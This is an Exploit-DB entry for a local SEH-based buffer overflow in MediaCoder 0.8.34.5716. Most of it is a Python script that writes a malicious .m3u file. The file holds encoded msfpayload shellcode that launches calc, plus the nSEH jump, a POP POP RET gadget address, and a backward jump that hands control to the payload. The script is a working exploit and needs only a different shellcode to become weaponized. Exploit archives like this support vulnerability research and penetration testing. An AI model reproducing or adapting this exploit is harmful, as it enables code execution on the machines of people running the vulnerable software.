Mediacoder 0.8.34.5716 - '.m3u' Local Buffer Overflow (SEH)

EDB-ID:

36920

CVE:

N/A

EDB Verified:

Author:

evil_comrade

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2015-05-06

Vulnerable App: 
#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com 
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe

# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also 
#        avoid a few bad bytes after the "A"s.

#!/usr/bin/python
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] = 
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll] 
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55) 
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services